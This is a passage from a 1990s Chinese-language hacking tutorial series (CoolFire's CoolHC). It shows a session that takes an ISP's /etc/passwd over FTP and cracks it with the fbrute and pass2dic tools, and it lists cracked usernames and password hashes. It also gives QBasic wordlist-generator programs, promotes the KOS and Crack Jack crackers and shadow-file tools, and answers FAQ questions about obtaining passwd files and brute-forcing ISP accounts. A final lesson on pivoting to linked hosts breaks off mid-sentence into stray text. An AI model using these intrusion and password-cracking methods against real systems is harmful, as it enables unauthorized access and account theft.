yahoo:If.UlNFTal.bk:549:100:yahoo:/home/w3/yahoo:/bin/bash
basic:IgLUu9J03lbyU:550:100:basic:/home/w3/basic:/bin/bash
wunan:QUHEiPefAaKsU:551:100:xxxxxxxx:/home/w3/wunan:/bin/bash
kaoune:eVwM44uTLOpnY:552:100:kaoune:/home/w3/wunan/kaoune:/bin/bash
shuchuan:KgPlk7TT6pmBk:553:100:shuchuan:/home/w3/wunan/shuchuan:/bin/bash
fan:Jk6E9PqP7xemg:554:100:fan:/home/w3/toonfish/fan:/bin/bash

(CoolFire 注: 因为使用 PaSs2DiC 很容易找出 ID 与 Password 相同的. 故除了 Coffee外, 其它我找到密码的 EnCode Password 部份皆改过..... 除非你一个一个试啦~~~ 我没说喔!)

www:/etc$ exit
logout
Connection closed by foreign host.

(可以走了 !! 改用 FTP 将 /etc/passwd 给抓回来吧!)

ms.hinet.net.tw> ftp www.coffee.com.tw
Connected to www.coffee.com.tw.
220-
220- 欢 迎 光 临 ....... 以下略! 因涉及该 ISP 的名誉, 大家自己去看吧!
220-
220-
220- There are 0 users in FTP Server now.
220- 目前已有 0 使用者在此 Server 上.
220- If you have any suggestion, please mail to:
220- service@xx.xxxxxxx.xxx.xx.
220-
220-
220-
220 www FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.

(还是使用刚刚的帐号进入)

Name (www.coffee.com.tw:YourName): coffee
331 Password required for coffee.
Password:
230 User coffee logged in.
Remote system type is UNIX.
Using binary mode to transfer files.

(直接到达档案放置地点)

ftp> cd /etc
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
ttys
fdprm
group
issue
motd
mtools
profile
securetty
shells
termcap
skel
csh.cshrc
csh.login
lilo
inet
default
services
HOSTNAME
DIR_COLORS
passwd
passwd.OLD
wtmp
utmp
gettydefs
inittab.gettyps.sample
ld.so.conf
ld.so.cache
at.deny
fs
magic
rc.d
syslog.conf
printcap
inittab
sudoers
vga
diphosts
mail.rc
ppp
NNTP_INEWS_DOMAIN
sendmail.st
NETWORKING
gateways
bootptab
exports
ftpusers
host.conf
hosts
hosts.allow
hosts.deny
hosts.equiv
inetd.conf
named.boot
networks
nntpserver
protocols
resolv.conf
rpc
ftpaccess
hosts.lpd
ftpconversions
snooptab
msgs
ftpgroups
slip.login
slip.hosts
yp.conf.example
X11
lilo.conf
sendmail.cf
fstab
fastboot
mtab
syslog.pid
klogd.pid
shutdownpid
localtime
passwd.old
ioctl.save
psdevtab
ftp.banner
ftp.deny
issue.net
motd.bak
securetty.old
226 Transfer complete.

(取回该档案)

ftp> get passwd
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (4081 bytes).
226 Transfer complete.
4081 bytes received in 2.5 seconds (1.6 Kbytes/s)

(尽速离开)

ftp> bye
221 Goodbye.

好了! 有了 /etc/passwd 之後一切都好办了, 赶紧将你的宝贝收藏 PaSs2DiC 拿出来吧
!!快点跑一下, 让它自动产生字典档案:

C:/hack>pass2dic
PaSs2DiC V0.2 (C)1996 By FETAG Software Development Co. R.O.C. TAIWAN.

This tool will:

[1] Load PASSWD file and convert it to only username text file
[2] Write the file to a dictionary file you choise for target

Your Source PASSWD File Name: passwd
Your Target Dictionary Name: dic.cfe

PaSs2DiC Author: James Lin E-Mail: fetag@stsvr.showtower.com.tw
FETAG Software Development Co: http://www.showtower.com.tw/~fetag

C:/hack>

(这样就好了 ! 自动产生的档案会放在 dic.cfe 这个档案中, 咱们跑一下 Brute Force看看!)


C:/hack>fbrute passwd @dic.cfe

BRUTE!, Unix Brute Force Hacking Routine. v2.0
Copyright (C) 1990, Prometheus. DOS-fastcrypt made available by sir hackalot.
阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐

                                       
Attempts/Hits: 5184/9
                                       

Taking list input from dic.cfe
Beginning search of passwd for password: xxx

Match for password xxxxxx found! Username: xxxxxx
Match for password xxxxx found! Username: xxxxx
Match for password xxx found! Username: xxx
Match for password xxxxxx found! Username: xxxxxx
Match for password xxxxxx found! Username: xxxxxx
Match for password coffee found! Username: coffee
Match for password xxxxxxx found! Username: xxxxxxx
Match for password xxx found! Username: xxx
Match for password xxxx found! Username: xxxx

Done.

C:/hack>

看! 除了 coffee 外还是有许多人使用与 ID 相同的字作为密码, 实在是....@#$%^...&*因某些关系所以其它部份要被 "马赛克" 起来, 请各位读者见量!

**** 再谈密码 ****

看了以上的破解示范, 就可以了解到许多人还是对於 "密码" 这东西不是很有 "密码"的观念, 人就是那麽的懒, 随便设定一个好记的, 但是这种密码确是最不安全的, 上次我们谈到如何用
QBasic 来设计一个自动产生密码的小程式, 相信对许多人有很大的帮助,底下我们再来浅显的介绍一下字母密码的产生方法, 相信对於你在 Hack 某站会有更大的帮助.

事情的开始是有一位网友 mail 给我, 问我字典档要如何写程式来 "自动扩大",而让我有了写这一段的想法, 现在我就针对这位网友的问题作一个更详细的说明 (因已简短回信答覆),并且写出来让大家了解一下, 当然我们的示范还是使用 QBasic, 因为这是最容易找到的程式了,而且语法大家也可能会比较熟悉一点, 如果我使用 VB 或 C 来写, 可能有些人只会拿去用,而不会去修改或者写个好一点的出来!

先说明一下原理好了: 我们所要作的程式是一个自动产生字典档的程式,所以我们要了解字的字母排列到底有哪些方法可循?? 我们先举几个简单的单字出来比较看看:

[1] apple [2] guest [3] james [4] superman [5] password

OK! 来看看! 如果你有一点英文的概念的话应该会知道母音及子音吧 !
我们首先这样说明: 母音在英文
上有 : A E I O U 这五个, 所有的英文单字都会有这些母音(有些没有的可能是专有名词或缩写), 也有可能是双母音的字, 如: au, ai, ea, ei, ia, ie, ou, oe, ui, ua... 等,
再来就是比较每个字的开头, 有可能是母音,也有可能是子音, 但是子音之後通常接的是母音字母, 但是也有例外, 如: student是两个子音再接一个母音字母, 所以接下来依照常用字将这些子音找出来, 我想了一下大概有: br, bl, cl, dg,dr, fl, gr, kn, ph,  st, sp, wh .... 等几种(其它请自行统计), 然後是结尾部份, 通常结尾部分有下列几种: e;est; ord; ard;  ls; es; s...等好多好多, 我们稍为思考一下就知道要如何写出这样的程式出来了 !!
我大略写一个简单的, 其它大家自行发挥, 如果有人学语言学的, 请帮忙弄一份常用组合表出来, 可能会更有帮助吧 !!

底下就是该程式片段, 执行後会产生 MyDic.Txt 档, 大小为: 22,096 Bytes 共有 3120个字的字典!!

--------------- MakeDic.BAS Start Here
-------------------------------------------------------------------------------
--------
DIM FirstWord$(20)
DIM MotherWord$(13)
DIM LastWord$(12)

DATA "br", "bl", "cl", "dg", "dr", "fl", "gr", "kn", "ph", "st", "sp", "s",
"t", "p", "k" , "f", "m", "n", "b","k"
DATA "a", "e", "i", "o", "u", "ai", "ei", "ea", "io", "ou", "oi", "au", "eo"
DATA "st", "ord", "ard", "e", "es", "le", "ng", "st", "ing", "n", "b", "s"

FOR I = 1 TO 20
READ FirstWord$(I)
PRINT FirstWord$(I)
NEXT I

FOR I = 1 TO 13
READ MotherWord$(I)
NEXT I

FOR I = 1 TO 12
READ LastWord$(I)
NEXT I

OPEN "MyDic.txt" FOR OUTPUT AS #1

FOR I = 1 TO 20
FOR J = 1 TO 13
FOR K = 1 TO 12
PRINT #1, FirstWord$(I) + MotherWord$(J) + LastWord$(K)
NEXT K
NEXT J
NEXT I

CLOSE : END
--------------- Cut Here, End of MakeDic.BAS
-------------------------------------------------------------------------------
-

当然这只是小部份的组合, 相信你可以作出一个更大的字典档出来, 如:
子音+母音+子音+母音+子音, 作出来的字典档会很吓人喔 !! 这一个部份就讲到这里了 ! 如果你有很棒的字典产生程式,写好了请 Mail 一份给我喔 !! 如果可以的话请说明是否可以公布在我的 W3 上让其它人下载 !!还是你只是要给我 ?!

希望每次讲到密码的问题後, 大家可以将这些密码的产生方法与自己的密码对照看看,如果有相同的请赶紧将自己的密码换掉, 我讲得口沫横飞, 都没有人要听吗 ??? 咖啡业者...... ISP
们.... 教教你们的使用者吧..... 唉~~~~

**** 後语 ****

我们的首页感谢大家的支持, 现在人数已经到达 2,000 了, 这是一个地下站(未对外正式公布) 很棒的一个数字, 在与其它工作室人员研究之後,  暂时不对外公布站址, 如果你是 "误闯"到本站来的! 我们欢迎你的加入, 但目前尚不考虑对外公布站址, 请您在告诉你的朋友有这麽一个站存在的时候,请他不要随便告诉别人 (请只告诉你信赖的朋友; 或对电脑有一份特别狂热的人, 我们都欢迎他们的加入),我们目前所采用的方式将是开放式的! 对首页部份暂时不以密码方式处理.

** 不要 Crack 这个首页的 ISP!!!! 否则 FETAG Sofeware's Hacking Page将会完全关闭, 再也不寻找其它的地方来放置, 希望给你的是使用电脑的 "知识", 不要利用它来夺取任何的 "权利",本首页著重的是教育, 而不是一 的教导攻击的方法, 希望大家对於政府机关 (org.tw) 或教育机构 (edu.tw)不要作任何的破坏!!还有我的 ISP......

------
4
经过了上一次的实战, 该 ISP 已经灰头土脸, 当然也已经将被我揪出密码的 UserPassword 改掉了, 但是系统安全部分还是没有多大的改进, 唉.... 有点伤心.这一次的内容主要在加强上次所说明的字典档部分, 因为我又想到另外一个方法可以快速的产生字典档,而且用这个方法产生的字典档更吓人; 当然还要跟大家介绍另一个好用的 Password Crack 工具,并加上最近的一些信件整理出来的 FAQ 等, 希望能在过年以前就将这一篇写好!

本次主题: 字典档的维护及更新
连接位址: 无
特别说明: 快点加强一下你的字典档吧 !! 不然怎麽破密码哩?!

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
**** 课程开始 ****

依我看, "字典" 这个讨论应该是谈不完的了, 因为有太多的方法了,但是为了维护你自身的权益, 自己的密码最好保管好, 我在前几天刚拿到  KOS 的时候, 拿她来跑一个 ISP 的 /etc/passwd 档案, 原先单单使用 Crack Jack 只找到 22 组的密码, 用了  KOS 加上 Crack Jack 居然共找到了88 组的密码, 还好该 ISP 不像 高-NET 一样是属於 "时数收费" 的收费方式, 不然可能有许多的User 自己当了冤大头都还浑然不知. 所以这个讨论还是免不了的, 如果你觉得你不需要这些知识,请跳过去吧!!

上次的字典档讨论, 我写了一个简短的程式出来产生了 3120 组的密码,但是这些密码并不一定是一个 "字", 也就是说产生完全合乎我们所限定的 "法则", 但却不一定是一个已存在的字,
所以如果要产生一个 "高效率" 的字典档, 使用上次所说的那种方式就不是一个很好的方法了.
以上次所写的程式 MAKEDIC.BAS 所产生的 MyDic.txt 为例, 其中的 braard clale cleoe dgeiingdgeie.......等字就不是很 "正常" 的字, 当然也有可能是某人的密码, 但其机率小之又小.

这次所写的程式名称为 TXT2DIC.BAS, 我们还是先使用大家都熟悉的 QBASIC 来写,以方便日後的修改, 先说明一下原理: 这个程式是一个自动产生字典档的程式, 我们是经由给程式一个"文字档", 然後由程式自该文字档中 "抽取出" 字出来, 这些文字档必需是英文的文字档,如果使用中文的文字档的话程式跑起来会有问题, 英文文字档的取得可由英文版软体的 Readme档或网路上的英文版学术论文或其它的来源.

当然有可能在文件中会出现像 www.showtower.com.tw/~fetag 的字眼,我们总不能把它也列入字典档中吧! 所以程式中有一点小小的设计, 就是该字若字母数大於 10 则不列入考虑,我们也可以使用上一次所介绍的子音+母音... 等的公式来作检查法, 但是我没有太多的时间作这些事,留待有空的人来写吧!!

底下就是该程式原始码, 请各位以 QBASIC 来启动并执行它:

--------------- Txt2Dic.BAS Start Here
-------------------------------------------------------------------------------
--------
CLS
PRINT "Txt2Dic Version 0.1B (C)1997 By CoolFire ReChange: CoolFire"
PRINT "[Source Released, For Changer, Add Your Name in ReChange Field]"
PRINT
LINE INPUT "Text File Name: "; TxtFile$
LINE INPUT "Output Dic Name: "; DicFile$
OPEN TxtFile$ FOR INPUT AS #1
OPEN "TMPFILE1.$$$" FOR OUTPUT AS #2

REM Filter for text file

ReInput:
IF EOF(1) THEN GOTO EndFile
LINE INPUT #1, L$
ReTry:
L$ = LTRIM$(L$)
L$ = RTRIM$(L$)
TmpValue = INSTR(L$, " ")
IF TmpValue <> 0 THEN
DicTxt$ = LEFT$(L$, TmpValue - 1)
PRINT #2, DicTxt$
LOCATE 7, 1: PRINT "Step 1, Add word : "; DicTxt$; STRING$(10, " ")
L$ = RIGHT$(L$, LEN(L$) - TmpValue)
GOTO ReTry
ELSE
GOTO ReInput
END IF
END

EndFile:
CLOSE
REM Filter for special chapter and lower-case the word

OPEN "TMPFILE1.$$$" FOR INPUT AS #1
OPEN DicFile$ FOR OUTPUT AS #2
Special$ = "-,.:<>?*()/_" + CHR$(34)
DO
LINE INPUT #1, L$
FOR I = 1 TO 13
SP$ = MID$(Special$, I, 1)
TmpValue = INSTR(L$, SP$)
IF TmpValue <> 0 THEN
LOCATE 8, 1: PRINT "Remode special word :"; L$; STRING$(10, " ")
L$ = ""
END IF
NEXT I
IF L$ <> "" THEN
L$ = LCASE$(L$)
PRINT #2, L$
END IF
LOOP UNTIL EOF(1)
CLOSE
KILL "TMPFILE1.$$$"
END
--------------- Cut Here, End of Txt2Dic.BAS
-------------------------------------------------------------------------------
-

我只花了几分钟写这个程式, ,所以有些考虑到的地方都没有作修改, 在这里再作些说明: 这个程式的第一个部份为分解字串, 将碰到的 CHR$(20)
也就是空白分离出来, 这是分解一句话中字与字最简单的方法,并且会将分解出来的字存在一个暂存档中, 作为第二部分的使用. 第二部分将暂存档读入,  并过滤非正常的字母出现,我只让它过滤了十三种特殊字如: -,.:<>?*()/_" 等, 当然如果你可视需要再作删减的功能.

原本想要再写排序及过滤重覆字的功能, 但是这些功能不是那麽需要,因为在排序方面你可以使用电脑中 DOS 的 SORT 或 Crack Jack  的 JSort, 过滤重覆字也有 CoolFire 的 De-Sort可以使用, 所以就先在这里停住, 有心的读者可以自行修改, 修改完後也请传送一份给我,作为日後教学的参考之用, 或提供网友们分享.

**** 新工具程式 Global KOS Krack (KOS) ****

记得从上次讲过 Crack Jack 之後好像就没有再讲过 Password Crack 的工具程式了,当然也跟最近没有甚麽好程式出现有关系,  像前一阵子风行的 Mail Bomb 最近也没有再见到改版,倒是出现了一些写得不怎麽样的 Bomb 程式, 了无新意, 我现在还是在用  KaBoom 3.0, 你呢 ??
前几天无聊逛了一下国外的 Crack 站台, 意外的发现了一个叫作 KOS 的东西, 传回来试了一试果然不错,而且里面还包含了一个 3MB 多的字典档, 这对字典档中缺料的读者们肯定会有帮助的.
KOS 是许多工具的集合, 由一些批次档对这些工具作了很棒的整合, 它必须与 Crack Jack一起使用才能运作, 平常我们在处里 Password Crack 时都需要考虑到第一个字母大写, 加数字,
字母大小写转换等等的工作, 都可以由 KOS 一手包办, 你只要取得 KOS, 就可以配合著 Crack Jack将以前单单使用 Jack 寻找的 /etc/passwd 再翻出来 Crack 看看, 保证你会体会到拥有 KOS的好处.

像前面所说的, 我将以前只找到 22 组密码的 /etc/passwd 重新跑过, KOS居然可以帮助我找出 88组的密码, 足可见 KOS 可以增强 Crack Jack 四倍的 Cracking 能力, 作者宣称 KOS 在
NT 上开了DOS 视窗就可以跑, 但是我以 NT 4.0 中文版及 Windows 95 (97 年版) 测试後还是因为Jack 无法在上面运作而停摆, 只好回到纯 DOS 模式下才能够使用, 但是 KOS还是能发挥它强大的功能, 唯一需要的就是一部速度快一点的机器, 当然还有时间也是必需的.

我使用 KOS + Crack Jack 在 Pentium-100 32MB RAM SCSI-II HDD 上跑一个/etc/passwd  档加上我的字典档 (passwd 档案大小为 197K, 字典档大小为 5.1MB),跑了四天都还没有完全跑完的情况, 就可以知道 KOS 尽了多大的努力在帮我们找出密码, 当然如果你的 /etc/passwd 只有几 K大小可能只消几个小时就可以全部跑完了!! 不过要找出 root 密码, 可能还是要靠点运气才行了....

KOS 的压缩档中还包含了 SHADOW.C 及 UNSHADOW.C 两个解 shadow 的程式, 可在 Unix主机上编译以取得被 shadow 过的 /etc/passwd, 在这里也顺便提出,网友们不要忘了顺便试试这两支程式.

想要知道哪里可以拿到 Global KOS Krack ?? 到我们的 Home Page 看看吧!!

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
**** CoolFire FAQ ****

[Q1]请问一下你的letmein 2.0何时出来?
[A1]因为最近实在是太忙了, 所以有很多的事情都没有办法依照预定的行程作完,所以最近也都不敢再多排订行程,看看最近首页更新的状况也应该知道我们实在是没有时间多作别的事了, 所以要先跟期待 LetMeIn 2.0 的人先说生抱歉, 但是我们的 Idea 还是在持续增加中,所以如果有空写  LetMeIn 2.0 的时候将会推出很棒的版本, 请再等等吧~~~ 这阵子先过了再说!!

[Q2]请问一下letmein 1.0 的setup keys-要如何设定? 如果用 netterm 要找login name& passwd在letmein要怎样设定不断换行, 而不会文字一直加长?
[A2] LetMeIn 1.0 已经有作一份中文的简易说明来补充原先说明档的不足,所以如果你对该软体有不清楚的地方请先阅读这个说明档之後再提出问题, NetMeIn 1.0 是在 NetTerm下作的测试,所以使用 NetTerm 配合 LetMeIn 应该不会有问题, 请再试试看!

[Q3]请问 "最新之系统安全 mailliast" 要到那里去看? 还是要订阅? 如何订阅呢?是英文or 中文?
[A3]原本想要在这次首页更新的时候加入一些 Mail List 订阅的连结点,但是因为时间太匆促所以没有作, 先跟各位说声抱歉了, 你可在国外的 Hacker 站找到,或是先订阅下面这一个List 来看看, 不过目前这类的 Mail List 都是英文的.

写到: Majordomo@ns2.rutgers.edu
标题: (空白不填)
内容: SUBSCRIBE www-security 你的 E-Mail 信箱

[Q4]为什麽 De-sort 不能用? Key In ..... 为什麽会这样??
C:/Program Files/LetMeIn>de-sort
De-Sort V0.1 (C)1996 By FETAG Software Development Co. R.O.C. TAIWAN.

This program will:

[1] Delete reiteration word from a dictionary file
[2] Write the new file to a temp file
[3] Delete old dictionary file
[4] Rename new dictionary file as old one's file name

Dictionary file name: 1
{Now Start To Check}

Some error found when program processing, Code= 53

De-Sort Author: James Lin E-Mail: fetag@stsvr.showtower.com.tw
FETAG Software Development Co: http://www.showtower.com.tw/~fetag
C:/Program Files/LetMeIn>
[A4]出现 Error Code = 53 代表开档有问题, 你所输入的档名 '1' 这个档案可能不存在,你
应该检查看看这个档案是否存在於目前目录, 否则就应该给它目录名称, 其它的ErrorCode 可以参考 QuickBasic 或 Basic PDS 的书籍来查出错误发生的原因是甚麽!

[Q5]小弟自从放寒假後,"高-Net"费用 往上狂飙, 急起直追请问你有Crack 过 "高-Net"吗??
"高 - Net"的防备似乎蛮强的!我是你的忠实读者,你的作品coolhc-1,coolhc-2,cool-3,我都有努力钻研学习,但就是弄不到 etc/passwd, 不知是不是我资质太低 ~~#@$%烦请高
手帮忙弄到 etc/passwd Ps: coolhc-2,and coolhc-3 最後的那句(高-Net 还是除外)是说"高-Net"可以或不可以 Crack ,如果不可以就不用帮我Crack 了![A5]当然还是有漏洞, 我有稍微试过, 只要是新发现的 Bug,他们会很快的有人将漏洞补上,而且该 ISP 有许多的工作人员, 并且采用计时收费的方式, 所以就算你 Crack 了,也是将帐目算到别人头上, 有点缺德, 所以不需要 Crack 它, 大家不要申请它这个 ISP就好了! 不然还是请你看看系统安全的 Mail List 了解最新的系统安全消息!比它们快一步进入系统就可以了! 这个文章还是以教学为目的, 无法给你 ISP 的 /etc/passwd!

[Q6]Hinet 密码 to Dic: 因为 Hinet 的密码格式是 1abcdefg 所以我就依照 coolhc-3的程式设计了这个东西!  (0aaaaaaa ~ 9zzzzzzz) 希望会有用! 欢迎批评,指教,修改.---------------  HinetPas.BAS Start Here
-------------------------------------------------------------------------------
--------
DIM No$(10)
DIM Eng$(26)
DIM LastWord$(26)
DIM a$(26)
DIM b$(26)
DIM c$(26)
DIM d$(26)
DIM e$(26)

DATA "0", "1", "2", "3", "4", "5", "6", "7", "8", "9"
DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o",
"p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"
DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o",
"p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"
DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o",
"p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"
DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o",
"p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"
DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o",
"p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"
DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o",
"p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"
DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o",
"p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"
FOR I = 1 TO 10
READ No$(I)
PRINT No$(I)
NEXT I

FOR I = 1 TO 26
READ Eng$(I)
NEXT I

FOR I = 1 TO 26
READ LastWord$(I)
NEXT I
FOR I = 1 TO 26
READ a$(I)
NEXT I
FOR I = 1 TO 26
READ b$(I)
NEXT I

FOR I = 1 TO 26
READ c$(I)
NEXT I

FOR I = 1 TO 26
READ d$(I)
NEXT I

FOR I = 1 TO 26
READ e$(I)
NEXT I


OPEN "Hinetpas.txt" FOR OUTPUT AS #1

FOR I = 1 TO 10
FOR J = 1 TO 26
FOR k = 1 TO 26
FOR l = 1 TO 26
FOR m = 1 TO 26
FOR n = 1 TO 26
FOR o = 1 TO 26
FOR p = 1 TO 26
PRINT #1, No$(I) + Eng$(J) + LastWord$(k) + a$(l) + b$(m) +
c$(n) + d$(o) + e$(p)
NEXT p
NEXT o
NEXT n
NEXT m
NEXT l
NEXT k
NEXT J
NEXT I
CLOSE : END
--------------- Cut Here, End of HiNetPas.BAS
-------------------------------------------------------------------------------
-
[A6]谢谢这位网友, 你的 For... Next 的 Deep 实在太长了,不得不将格式改变一下才能放
进文章中. 也希望有更多人的集思, 写出更多字的字典档!


[Q7]我用pass2dic时没辨法转成文字档ㄟ, 会有错误说(以下的讯息)请问要如何更正...
Some error found when program processing, Code= 75
[A7]试过了, 都没有办法产生这样的 Code, 所以请看看磁碟是否防写, 或参考 BasicPDS的
书籍寻找该 Error Code 的解释或说明.

[Q8]请问一下,passwd除了会放在/etc/之下,还有可能会放在哪儿?
[A8]有有可能是 /etc/ 目录中的 passwd.??? 或 shadow 或 shadow.??? 都有可能.

[Q9]我有在你的HOMEPAGE DOWNLOAD CoolHC#1.txt
里面有些步骤不懂如:1.(首先要先连上某
一台你已经有帐号的 Telnet 主机.....)? 是不是在刚上HINET时出现拨号视窗下选=3

进入TELNET?还是SELECT=1 进入PPP後用WS-FTP 找寻etc/pass 的档案?
2.(我有在你的HOMEPAGE DOWNLOAD A letme.. of program 有点像claymore,不过不会使用
Q.他不把所有的设定都用好後按"START BF"在 DELAY 未结束时,把游标移到要 CRACK 的
PASSWORD BOX?但是出现了很长的数字也没有 CRACK? 3.(我在一些国外的WAREZ 看过有关HACK
UNIX的文件里有写都包函一段 "C"语言,是不是能在 TELNET 下输入执行程式就会自动CHECK
PASSWORD?是不是你在 "COOLHC#1.TXT里有保留一段进入 SYSTEM 的程式?
4.(有时用WS-FTP下找PASSWORD时,不是隐藏就是没用的档案,是否有方法让隐藏档显示?
5.你有一个AUTOHACK是不是一种利用拨电话的方式进入主机?(有点像电影中的战争游戏)?
6.像SHADOW.C的档案要如何组译成执行档?
[A9]好多的问题喔, 我一个一个回答吧! 1.LetMeIn! 是用在 PPP 模式, 不是 Telnet模式, 你
先连上 PPP 模式後开启 NetTerm 然後开 LetMeIn! 在 LetMeIn! 中作好设定按下Start键後再回到 NetTerm  等待自动输入. 2.Telnet 可在你的 Win95 中找到, 只要连上 PPP模式就可以使用, 你也可以使用 NetTerm 之类的软体,  不一定要在连线时选 Telnet模式.3. LetMeIn! 需要在启动後回到 Telnet 软体才会自动 Crack 4.AutoHack是自动拨号寻找有连接数据机的电话号码, 对 InterNet 来说可能没有用出吧! 5.用这一期 CoolHC所说的 KOS 中有  Shadow.c 可以试试. 6.用 cc 指令可以编译, 但要看你的 ISP有没有提供.

[Q10]请问我抓到的一些字典档 .Z 格式, 为何无法用 uncompress 解开,解开後都是一些乱码
[A10]如果你用 Windows 或是 Win95 的话, 试著安装 WinZip 应该就可以解开了 !!

[Q11]请问能够提供更多的crack document吗(能有中文吗,英文的有点吃力说)或是介绍更多的
Crack Tools.
[A11] CoolHC 就是中文的呀! 但是其它的当然只有英文的可以看罗,现在有没有多少人投入在
写这样的东西呀~~ 本期的新工具就有介绍 KOS,如果下此有好工具也会一并提出来介绍,若有网友使用的心得也可以传给我放在 Home Page 上!

**** 後语 ****

CoolFire 改 E-Mail 了! 因为 HotMail 都要用 WWW 浏览器才能收信, 有点火大,所以这次在
CyberSpace 申请了一个新的帐号, 请写信给我的时候不要投错信箱了喔~~~~
E-Mail: coolfire@cyberspace.org

我们的首页感谢大家的支持, 现在人数已经超过 2,600 了, 这是一个地下站(未对外正式公布)
很棒的一个数字, 在与其它工作室人员研究之後, 暂时不对外公布站址, 如果你是 "误闯"到本
站来的! 我们欢迎你的加入, 但目前尚不考虑对外公布站址,请您在告诉你的朋友有这麽一个站
存在的时候, 请他不要随便告诉别人 (请只告诉你信赖的朋友;或对电脑有一份特别狂热的人,我们都欢迎他们的加入), 我们目前所采用的方式将是开放式的!对首页部份暂时不以密码方式处理.

** 不要 Crack 这个首页的 ISP!!!! 否则 FETAG Sofeware's Hacking Page将会完全关闭, 再
也不寻找其它的地方来放置, 希望给你的是使用电脑的 "知识",不要利用它来夺取任何的"权利", 本首页著重的是教育, 而不是一 的教导攻击的方法, 希望大家对於政府机关(org.tw) 或教育机构 (edu.tw) 不要作任何的破坏!! 还有我的 ISP......

------
首页更新部分因为最近都太忙了, 所以每个人都没有时间写, 希望各位见谅, 这次特别把CoolHC的内容增加, 希望可以让你学到更多, 如果有人有写类似这样的文章, 请寄给我一份,
我也会将它放到首页上的~~~

------
5
本次主题: 善用你所得到的任何资讯 (Exm: HOSTS 档)
连接位址: xxx.xxx.xxx.xxx (又马赛克啦)
特别说明: 因为该站台是一个 "很大" 的 网路提供者, 其服务地区遍及全亚,
所以必须要特别以马
赛克来处理, 希望网友们不要介意 (咱们重的是内容嘛!! 又不是..
那个.. 那个). -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
**** 课程开始 ****

首先说明的是, 这个网路提供者的服务项目,包含了拨接及传真还有帮其它业者架设网路等, 也就是说如果我们能够善用他们的系统就可以免费传真罗 ??  哇哩... 国际传真耶,这间公司不就亏大了!!!!!所以马赛克处理是必要的, 不过这次的课程不是说明这个 ISP 够大,而是我们如何利用一组已经破解的密码来入侵其它与其相连的主机, 这点是比较重要的!!

大家可能早就已经知道, 在 Unix 系统中 /etc 目录下的 hosts 档案的作用了,我们今天就来谈谈, 知道的人跳过去吧!! 如果使用  Windoz 95 的人, 也可以看看在你 95的系统目录中也有一个这样子的档案, 他是长得像这个样子的:  127.0.0.1 localhost FETAG , 表示 127.0.0.1 为LocalHost 也就是 FETAG 的电脑, 所以我们要找与该 Unix 有 "直接关系" 的主机可以由这个地方找到.

找到这些主机有甚麽用呀 ?? 继然你已经有了一个主机的密码,当然其它的主机也可能会有相同的User 在其它的主机上用同样的帐号, 而且依据经验来说,他们在其它主机上的密码通常都

原创粉丝点击